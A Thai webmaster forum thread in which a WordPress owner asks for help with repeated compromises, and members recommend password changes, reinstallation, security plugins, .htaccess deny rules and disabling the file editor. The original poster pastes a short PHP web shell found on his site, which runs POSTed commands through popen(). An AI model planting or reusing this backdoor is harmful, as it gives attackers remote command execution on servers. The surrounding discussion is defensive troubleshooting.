|
หัวข้อ: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: canova ที่ 19 มกราคม 2015, 23:58:52 อาจจะเขียนเวอร์ไปหน่อยแต่ มันแฮคผมเข้ามาบ่อยมาก ผมก็แก้ๆ มันก็แฮคอีก ตอนนี้เลยทำ htaccess ผมก้กันเต็มที่ แต่ก้ยังจะโดน
และก็ชอบโดน hack มานเจาะไปที่ wp-content/upload บ้าง wp-includes/wp-db.php ล่าสุด โดน ไปที่ plugin ไม่ทราบว่ามีวิธีการบล๊อคไม่ให้คนอื่นเข้าไฟล์ พวกนี้ได้รึเปล่าครับ ผมโดนจนหงิงละ :'( ไม่รู้กันยังไงละคับ หรือมี code ที่ต้องใส่ htaccess เพิ่มรึเปล่า ผมไม่รู้จะกันไง ออลืมบอก บางครั้งมันชอบเอาไฟล์ wp-mod.php มาใส่ในเวปผม ผมก็ลบออกตลอด ช่วยผมที :wanwan011: หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: gulmiku ที่ 20 มกราคม 2015, 00:02:52 ลองไล่ดูตั้งแต่ plugin หรือ theme อาจมีช่องโหว่ทำให้ hacker เข้ามาได้ครับ
แต่ theme หรือ plugin ไม่มีปัญหานี่อาจจะมาจากช่องโหว่ของ hosting ที่ท่านใช้บริการ :wanwan009: :wanwan009: :wanwan009: :wanwan009: หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: canova ที่ 20 มกราคม 2015, 00:10:58 ตอนนี้ใช้ hostgator อะครับ ผมได้ลองไล่ดูละนะครับ เจอประมาณนี้ ในส่วนของ error_log
PHP Warning: Cannot modify header information - headers already sent by public_html/wp-content/plugins/download-manager/functions.php:445 PHP Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in public_html/wp-includes/wp-db.php on line 1036 ผมลองเชคดูไฟล์เทียบกับตัวเก่าที่ backup ก้เหมือนเดิม ไม่รู้จะหาไงละคับ ลองเอาโต๊ดเปรียบเทียบก้เหมือนเดิม ปวดหัวจริงครับ อะไรทำนองนี้ ขึ้นมาเยอะแยะเลย งงมากครับ ผมอยากได้วิธีป้องกันอะครับ แบบซ่อนไฟล์ไปเลยได้มั้ย หรือ block ให้เข้าได้แค่ ip ของผมไรอย่างนี้ มีวิธีไหนทำได้บ้างปะครับ หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: sy12za ที่ 20 มกราคม 2015, 00:11:58 backup ข้อมูล แล้วลงใหม่ครับ แก้ปัญหาเบื้ยงต้น
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: canova ที่ 20 มกราคม 2015, 00:30:55 คือ อย่างที่บอกไงครับ มีตัว backup อยุ่แล้ว แต่เดียวมันก้มาเจาะใหม่ ผมอยากได้วิธีป้องกัน แก้ปัญหาถาวรอะครับ
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: Jir4yu ที่ 20 มกราคม 2015, 00:31:48 วิธีป้องกันที่ง่ายที่สุดจากความเห็นส่วนตัวนะครับ
- ดูเรื่อง permission ไฟล์ (ลืมเปิด chmod 777) ทิ้งไว้หรือเปล่า - ลงธีม / plugin จากเว็บไซต์ผู้พัฒนา หรือผู้ขายโดยตรงเท่านั้น ห้ามหาโหลดเถื่อนมาใช้ - ลองลง plugin iThemes Security แล้วปรับใช้ครับ :wanwan003: หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: xvlnw.com ที่ 20 มกราคม 2015, 00:42:00 1. ลบไฟล์ทั้งหมด ยกเว้น wp-content/upload/ (ตรวจสอบด้วยว่ามีไฟล์ *.php อยู่หรือไม่?)
2. อัพโหลด Wordpress ใหม่ขึ้นไป ตั้งค่า DB ให้เรียบร้อย (ฐานข้อมูลเดิม) 3. ล็อคอินเข้า WP ข้อมูลล็อคอินเดิม ติดตั้งตรีมและปลั๊กอินใหม่ทั้งหมด (ที่ไม่แคร๊ก) 4. แนะนำปลั๊กอิน All in one WP Securoty & Firewall และเปิด Firewall, Brute Force หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: tenzamak ที่ 20 มกราคม 2015, 00:42:51 บางครั้งเรื่องอาจจะจบง่ายๆแค่ลองสแกนไวรัสในเครื่องที่อัพไฟลืนะครับ
ผมเจอเคสลูกค้าด่าโดนแฮกๆมาหลายรอบละ เชื่อไหม ผมแอบเปลี่ยนพาสไม่ให้ลุกค้าเข้า หายขาดเลย ไอ้ที่แฮกจริงๆนะ ชาตินึงโดนหน ชาตินึงจริงๆ ฮ่าๆๆๆๆ หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: canova ที่ 20 มกราคม 2015, 01:34:10 iThemes Security เคยลองลงละครับ นี้ไม่ได้ช่วยเลยครับ เป็นตัวทำให้ hacker โกด ถล่มเวปผมราปเปนหน้ากองเลยครับ - - มันแค่ทำให้เข้ายากมากขึ้นเฉยๆ อยากได้แบบปรับพวก htaccess ไม่ก็ โค๊ดอะไรก็ได้ ซ่อนไฟล์พวก wp-content wp-include wp-admin พวกนี้ กันไม่ให้มันเห็นหรือทำให้เราใช้งานได้คนเดียว มีมะครับ ที่เขียนเป็น htaccess
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: kenessar ที่ 20 มกราคม 2015, 08:49:08 ลอง All In One WP Security & Firewall ดูครับ
https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ ลงแล้วตั้งค่าทุกเมนู ทุกแท็บ ผมเปลี่ยน url หน้าล็อกอินไปเลย + ป้องกัน Cookie ล็อกอิน + เปิดไฟร์วอล + ป้องกัน Brute Force (จริงๆมีมากกว่านี้ คอนฟิกกันมันเลยครับ) แต่ก่อนจะลง แนะนำว่า เปลี่ยนรหัส FTP ด้วยนะครับ เผื่อแฮ็กเกอร์มันได้ข้อมูลไปแล้ว อีกเรื่องที่เรามักจะมองข้ามก็คือ มัลแวร์ หรือ สปายแวร์ ในเครื่องเรานี่แหละครับ สแกนก่อน ไม่งั้นแก้ไปที่ฝั่งเซิฟเวอร์ไปก็ไร้ค่าครับ เพราะยังไงมันก็ได้รหัสผ่าน ftp หรือเก็บข้อมูลจากในเครื่องเราอยู่ดีครับ หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: adidog ที่ 20 มกราคม 2015, 08:52:33 ลองลบธีมที่ไม่ได้ติดตั้งจาก wordpress ออก ปลั๊กอินที่โหลดมาจากที่อื่น ลบออกให้หมด
แล้วไล่ดูในไฟล์ที่เป็นตระกูล index.xxx หรือในธีม ลองไล่ดูเลยครับ ผมเพิ่งโดนมากับธีม เข็ดเลยธีม null ตัวดีเลย :wanwan009: :wanwan009: :wanwan009: หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: zero1150kfc ที่ 20 มกราคม 2015, 09:05:50 ใช่ครับ เครื่องที่อัพและ อีกประเด็นหนึ่งเลย แนะนำเบื้องต้น
1. เปลี่ยน Passowrd ของ CP,FTP,WOrdpress อื่นๆทั้งหมด 2. ลงใหม่ให้หมด (ถ้าขยัน) เพราะผมเชื่อว่า เดะก็มาจากที่เดิมๆ นั้นแหละ 3. ห้ามใช้ ของ crack เป็นอันขาด หรือ Theme ที่เสียตังแต่แจกฟรี 4. ห้าม 777 กับ Folder ที่เป็นของ WP เด็ดขาด ถ้าจะใช้หแนะนำ ให้ใช้กับ Folder ที่เราสร้างขึ้นเอง(ตั้งชื่อแปลกๆ หน่อยนะ)ก่อนอัพเช็คด้วยให้วางแค่ที่อนุญาติเท่านั้น 5. ไหว้พระ ทุกวันครับ :wanwan035: :wanwan035: ผิดถูกอย่างไงก็ขออภัยด้วยครับ หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: treehost ที่ 20 มกราคม 2015, 09:28:59 ผมว่าโดนเยอะไปหรือเปล่า น่าจะเกิดจากไม่ได้อัพเดท version หรือ theme รั่วอะครับ :wanwan021: :wanwan021: :wanwan021:
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: pandazz ที่ 20 มกราคม 2015, 09:36:16 ข้อมูลน้อยไป ไหนๆ ก็โดนแฮคละ เอา หน้าเว้บมาดูโลด :wanwan004:
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: morya ที่ 20 มกราคม 2015, 10:09:48 เคยโดนเหมือนกัน แต่น่าจะเป็นที่โฮส wp ทุกตัวในโฮสนี้โดนแฮกหมด แต่โฮสอื่น ไม่โดน
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: makoto ที่ 20 มกราคม 2015, 10:22:16 หัวอกเดียวกันเลย จะบอกว่า ที่แนะนำกันเข้ามานั่น ผมก็เคยทำเป็นรอบที่ร้อยแล้ว
ถึงขนาดย้าย host หนีก็ยังโดน (สงสัยเป็นที่โปรแกรม ftp หรืออาจจะอยู่ในเครื่องผมเอง) แต่ก็มั่นใจว่าไม่น่าจะมี ไอ้เรื่องมั่นใจนี่อาจจะพลาดแม้จะป้องกันเต็มที่ หลังๆ ผมเลยไม่แก้ล่ะ ปวดหัว แต่ป้องกันไว้เฉยๆ คือใส่ htaccess แบบ Deny from all ไม่ให้ใครเข้าเลย (รวมทั้งตัวเอง) เวลาจะใช้ก็เข้าไปแก้ไขนามสกุลไฟล์ htaccess เอา แล้วก็จัดการไฟล์ ส่วน user ไม่ให้ใครสมัครเลย มีแต่ admin คนเดียว เปลี่ยน pass เอาแบบยากสุดๆ 15 ตัว อาทิตย์ละครั้งก็พอ (pass ผมพิมพ์เป็นภาษาไทยแต่ keyboard ให้เป็นอังกฤษ เช่น pass ว่า รักกันไว้เถิดเราคนไทย จะออกมาว่า iyddyow;hg5bfgik8owmp แบบนี้) ถ้ามันแกะได้ก็ยอม ผมก็ตั้งเป็นคำสติกเกอร์ท้ายรถบรรทุก เอามาแม่มซัก 100 ประโยค สลับกันไป หนุกหนาน รู้สึกปลอดภัยมาเดือนกว่าๆ ล่ะ หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: sMongPed ที่ 20 มกราคม 2015, 11:03:29 *https://wordpress.org/plugins/wordfence/ ลองสแกนดู เผื่อไปรั่วตรงไหน
ถ้าไม่ได้มาจาก cms จาก backdoor ก็อาจจะโดนที่ pass ftp ไปรึเปล่า อ่ะ เห็นบอกอยากได้ โค๊ด: <FilesMatch "(wp-.*\.php|\.htaccess|\.htpasswd)"> ถ้ามี vpn/proxie ส่วนตัวก็เพิ่มไอพีเข้าไป ไม่งั้นเวลาจะใช้ทีนึงก็มา comment โค้ดเอา โค๊ด: <FilesMatch "(wp-.*\.php|\.htaccess|\.htpasswd)"> หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: tenzamak ที่ 20 มกราคม 2015, 11:20:13 ไม่ลองวิธีผมหน่อยหรอครับ เปลี่ยนะาสหนีแล้วห้ามเข้า ถ้ามันหาย กรอบมันก็แคบลงเยอะนะครับ
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: NaiTan ที่ 20 มกราคม 2015, 11:24:15 เขียน .htaccess
โค๊ด: <Files *.php> หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: canova ที่ 20 มกราคม 2015, 16:18:49 ขออนุญาติตอบเป็นข้อๆ ไปนะครับ
-สำหรับวิธีที่แนะนำมาเกี่ยวกับการลบ pass และเปลี่ยน มันก็แค่ยืดเวลาออกไปเช่นกัน สุดท้ายก้เจาะได้อยุ่ดีครับ ลองมาหลายรอบละ แต่เห็นเวปนอกเค้าบอกให้เปลี่ยน 90 วัน ต่อ 1 ครั้ง -ถัดมานะครับที่บอก permission ไม่น่ามีปัญหาเพราะผมจัดการเป็น644 หมดละ แต่ที่ผมบอกว่ากันไม่อยู่ก็เพราะ พวกนี้มันเจาะรหัสโดยการสร้างไฟล์ขึ้นมา เช่น wp-mod.php พอเข้าไปอ่านก็มีการแก้ โค๊ด ตั้งแต่ สร้างระบบสมัครสมาชิกเอง และซ่อนไว้ไม่ให้โชว์แสดงผล ไม่ก็แก้โค๊ดนั้นนู้นนี้ เพื่อเปิด permission ผมไม่รู้ว่าทำไงนะ แต่ผมโดนมาละ พวกรัสเซียนี้เลยตัวเก่ง บางทีก็เข้าไปใน wp-cron ไรพวกนี้ ดังนั้น ผมเลยคิดว่า การสร้างไฟล์ htaccess มันน่าจะเซฟกว่า เพราะตอนนี้ยังไม่โดนนะครับ แต่คิดว่าเดียวมันคงทำได้อีก -และก็ plugin เวปผมก็เป็นตัวพวกทั่วๆไป จะบอกว่ามี 6-7 ปลั๊กอิน แต่ครับ ย้ำ แต่ๆๆๆ มันก็ยังพยายามเข้ามาแก้ไขไฟล์ของผม ผมเลยใช้วิธี ที่คล้ายกับคุณ sMongPed มันเลยแก้ไขไม่ได้ แต่ผมก็ไม่อยากชะล่าใจนัก เพราะสิ่งที่เห็นอาจจะไม่ใช่อย่างที่คิด เพราะที่แน่ๆ โดนเจาะเข้ามาละครับ เหมือนพยาธิดีๆ -อ่าผมอยากจะถามพอดีสำหรับคุณ sMongPed ส่งโค๊ดมา ขอบคุณมาก อยากทราบว่ามันเหมือนกับอันนี้ของคุณ NaiTan มั้ยครับ หรือว่าของคุณครอบจักรวาลกว่า ? <Files *.php> Order Deny,Allow Deny from all Allow from 127.0.0.1 </Files> <Files index.php> Order Allow,Deny Allow from all </Files> -ส่วนวิธีที่ว่าให้แก้ไข ftp ในส่วนของ pass ขอทำความเข้าใจก่อนนะครับ เท่าที่ผมเข้าใจคือ cpanel กับ ftp จะใช้รหัสตัวเดียวกันใช่มะครับ ซึ่งผมทำการเปลี่ยนรหัสในส่วนของ cpanel แล้วครับผม แต่ในความรู้สึกของผม ผมก็คิดว่าน่าจะเข้ามาจากทางนี้เหมือนกัน ดังนั้นใครพอมีวิธีเปลี่ยน pass ของ ftp บอกผมหน่อยนะครับ ผมลองใช้ cpanel แล้วมันไม่มีให้กดเปลี่ยนเฉพาะไฟล์ -สำหรับในส่วนของ ปลั๊กอิน เดียวผมกำลังจะลองลงนะครับ ตัว All in one ขอบคุณตัวนี้มาก -และวิธีของคุณ tenzamak คือ อย่างที่บอกครับ มันสามารถสมัครสมาชิกของมันได้เอง ตั้งตัวเองเป็น admin และซ่อนไม่แสดงผล แต่ไม่รู้ทำไมเหมือนกันครับ ว่าพวกนี้จะลบข้อมูล post ไม่ได้ ถ้าลบได้ก็จะไปกองอยู่ในส่วนของ ถัังขยะ ไม่หายไปเลย ซึ่้งข้อมูลนี้เป็นข้อมูลล่าสุด แต่ผมเคยเจอแบบหนักกว่านี้ คือ มาลบบทความผมไปเลย ปล.สำหรับเพื่อนๆที่ยังไม่เคยเจอกรณีแบบผม ก็เข้ามาศึกษาได้นะครับ และสุดท้ายนี้ นี้คือ โค๊ดส่วนหนึ่งที่ผมโดน hack ลองไปแปลดุว่าคือไร (อยากจะบอกว่าตัวนี้สั้น เคยโดนยาวกว่านี้ เดียวไว้เอามาลงให้ดู) <?php if(isset($_POST["hash"]) and @md5($_POST["hash_access"]) == "5651899bce466094a582e8d95ba5ad71"){$fp = popen($_POST["code"], "r"); while (!feof($fp)) {echo fgets ($fp, 1024);} fclose($fp); die;} ?> หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: thaimarketpress ที่ 20 มกราคม 2015, 16:26:47 ใช้ server ส่วนตัว หรือว่าเช่า hosting ในไทย หรือเปล่าครับ
ถ้าเช่า hosting ของไทยๆ ไม่ต้องไปแก้ให้เหนื่อย หลังไมค์มาเลยครับผมจะอธิบาย หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: VadiForte ที่ 20 มกราคม 2015, 16:28:51 อันนี้ไป cmod 777 ทุกไฟล์หรือเปล่าครับ ถ้าใช่ ก็ไปแก้สะครับ แล้วเลือกเอาเฉพาะไฟล์ที่ต้องการแก้ไขจริงๆครับ
แต่ถ้าไม่ใช่ก็จบครับ เชิญท่านต่อไปครัช :wanwan017: หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: canova ที่ 20 มกราคม 2015, 16:30:43 ล่าสุด jetpack ใช้ไม่ได้นะครับ ขึ้น error 404 :wanwan044:
และก็อย่างที่ตอบไปอะครับ เรื่อง pesmission 744 ไม่น่าเกี่ยวครับ เพราะของผมเป็น 644 บอกไปแล้วนิครับ :wanwan044: สำหรับ server ผมใช้ hostgator dedicated server ครับ :P หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: jarsil ที่ 20 มกราคม 2015, 16:42:13 น่ากลัวจริงๆเลย กลัวเจอแฮกบ้าง
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: thaimarketpress ที่ 20 มกราคม 2015, 16:43:02 ล่าสุด jetpack ใช้ไม่ได้นะครับ ขึ้น error 404 :wanwan044: และก็อย่างที่ตอบไปอะครับ เรื่อง pesmission 744 ไม่น่าเกี่ยวครับ เพราะของผมเป็น 644 บอกไปแล้วนิครับ :wanwan044: สำหรับ server ผมใช้ hostgator dedicated server ครับ :P ถ้าโฮสนอก คงไม่ใช่ที่ผมสงสัย รอฟังผู้รู้อื่นๆ ครับผม หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: plamii ที่ 20 มกราคม 2015, 16:49:59 มารอดูดครับเก็บไว้เป็นความรู้
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: xvlnw.com ที่ 20 มกราคม 2015, 17:15:19 ตัวอย่างโค๊ดที่โดนฝัง LIMIT POST ตามโค๊ด .htacccess เค้าก็ POST ไม่ได้แล้วครับ
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: bellzaa ที่ 20 มกราคม 2015, 17:41:41 น่ากลัวววว :wanwan003:
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: canova ที่ 20 มกราคม 2015, 17:53:51 ตัวอย่างโค๊ดที่โดนฝัง LIMIT POST อ่านแล้วงง
เป็นโค๊ดยังไงครับ เดียวผมจะได้นำไปแปะ ขอละเอียดนิดนึงครับ หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: icez ที่ 20 มกราคม 2015, 17:55:05 ส่วนมากที่ผมเจอ
- ตั้งรหัสผ่าน admin ง่ายไป - เคยโดนเจาะมาแล้ว แต่ clear ไฟล์ที่โดนเจาะไม่หมด อาจโดนวาง backdoor ทิ้งไว้ แล้วเข้ามาเจาะซ้ำทาง backdoor - เครื่องที่ใช้ (เครื่องตัวเองเลยนะ) ติดไวรัส/โทรจันขโมยข้อมูลพวกรหัสผ่านอะไรพวกนี้ออกไป หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: sMongPed ที่ 20 มกราคม 2015, 18:00:41 ของผมมันจะป้องกันหลักๆแค่ wp-บลาๆ.php(เช่น ห้ามผู้ใช้ภายนอกใช้งานเรียก wp-config.php/wp-login.php/wp-บลาๆๆ) ในพาธเดียวกับ .htaccess น่ะครับ
ของคุณ naitan ครอบกว่านะ ครอบไปยังข้างใน .php ทุกไฟล์เลย ยกเว้น index.php ให้คนภายนอกใช้งานได้ cpanel เวลา add domain มันจะสร้าง ftp user ของโดเมนนั้นๆด้วย ตามไปลบทิ้งก็ได้นะ ถ้าใช้แต่ user หลักเข้าก็ได้(โดนดักพาสทีก็ไปทั้งเซิฟ 555) บอกไม่ถูกเหมือนกันแฮะ ดู access log ได้ไหมว่ามีไอพีอะไรเจาะหลังบ้านเซิฟ หรือเจาะ cms หรือเจาะ ftp รึเปล่า มันแก้ยากอ่ะไม่รู้ต้นตอที่เข้ามา ปล. โดนดักพาส ftp รึเปล่า ถ้าเข้ามาแก้ไฟล์ได้ขนาดนั้น ลองเปลี่ยน port ftp เล้ย เห็นใช้ dedicated sv น่ะ .. ถ้าโดนเจาะอีกคงมาทาง footprint ปลั๊ก/cms ไม่ก็โดนคนเจาะ ไม่ใช่บอทเจาะแระ :P หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: BrainFreeze ที่ 20 มกราคม 2015, 20:55:43 ลองวิธีผมครับ
https://support.hostatom.com/knowledgebase.php?action=displayarticle&id=318 หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: tommy009 ที่ 15 กุมภาพันธ์ 2015, 16:27:46 ผมคิดว่าเครื่องคอมอาจมี trojan อยู่ อาจจะเป็น keylogger อาจมาจากโปรแกรมหรือวินโดทีโมดิฟาย หรืออาจมาจากวง network ที่คุณใช้อยู่อาจมีคน sniff ข้อมูลคุณเวลาคุณส่งข้อมูลที่ไม่เข้ารหัส เพราะเท่าที่ดูแล้วก็ระวังเรื่องระบบรักษาความปลอดภัยบน server อยู่ ถ้าจะเจาะระบบ server ตรงๆ ของ server แต่ละแห่งมันไม่รวดเร็วและง่ายหรอกครับ
หัวข้อ: Re: โดนแฮก wordpress รอบที่ 1894 ช่วยทีครับ เริ่มหัวข้อโดย: zidit ที่ 15 กุมภาพันธ์ 2015, 20:19:03 ปัญหาหลักๆ เกิดจากที่ hacker เค้า login เข้า wp-admin ได้ครับ แล้วก็สามารถแก้ไข theme ตรง theme editor เพื่อใส่ code บางอย่างของ hacker ถ้าใส่ได้ ก็เสร็จเลยครับ ไฟล์แฮกอื่นๆ ก็จะตามมาอย่างสะดวกโยธิน ทางแก้เบื้องต่้นคงต้องเปลี่ยนพาสเวิด และอาจจะลองใส่บรรทัดนี้ลงไปใน wp-config.php ครับ
define( 'DISALLOW_FILE_EDIT', true ); เป็นการระงับไม่ให้แก้ไขไฟล์ผ่าน wp-admin |